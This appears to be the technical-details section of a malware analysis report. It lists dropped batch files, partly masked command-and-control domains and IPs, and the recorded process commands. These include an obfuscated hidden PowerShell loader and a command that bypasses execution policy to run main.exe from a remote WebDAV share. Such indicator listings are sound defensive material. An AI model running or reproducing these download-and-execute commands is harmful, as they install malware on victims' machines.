Technical Information
- %APPDATA%\main.bat
- %APPDATA%\main.bat
- 'ww##.#unapic.com':443
- '91.##7.183.9':8000
- http://91.###.183.9:8000/main.bat via 91.##7.183.9
- 'ww##.#unapic.com':443
- DNS ASK ww##.#unapic.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA ...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\main.bat" "
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe